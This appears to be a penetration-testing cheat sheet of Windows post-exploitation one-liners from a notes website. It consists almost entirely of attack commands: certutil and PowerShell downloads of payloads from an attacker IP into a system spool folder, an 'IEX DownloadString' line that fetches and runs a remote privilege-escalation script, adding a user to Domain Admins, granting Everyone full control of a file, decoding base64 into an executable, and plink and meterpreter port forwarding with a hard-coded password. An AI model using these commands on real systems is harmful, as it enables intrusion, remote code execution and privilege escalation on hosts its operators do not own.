99 Basic Command
Downloading files
Changing Permissions of a file
Adding user to Domain admins
Base64 Encode-Decode
Port Forwarding
1
// File Download
2
certutil.exe -urlcache -split -f http://ip/file file
3
Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"
4
5
// Powershell download
6
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'"
7
8
// Powershell remote execution
9
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
Copied!
1
icacls text.txt /grant Everyone:F
Copied!
1
Add-DomainGroupMember -Identity 'Domain Admins' -Members fkclai -Verbose
Copied!
1
certutil -decode foo.b64 foo.exe
2
certutil -encode foo.exe foo.b64
Copied!
1
# Port forward using plink
2
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080
3
4
# Port forward using meterpreter
5
portfwd add -l attacker-port -p victim-port -r victim-ip
6
portfwd add -l 3306 -p 3306 -r 192.168.1.56
Copied!
Copy link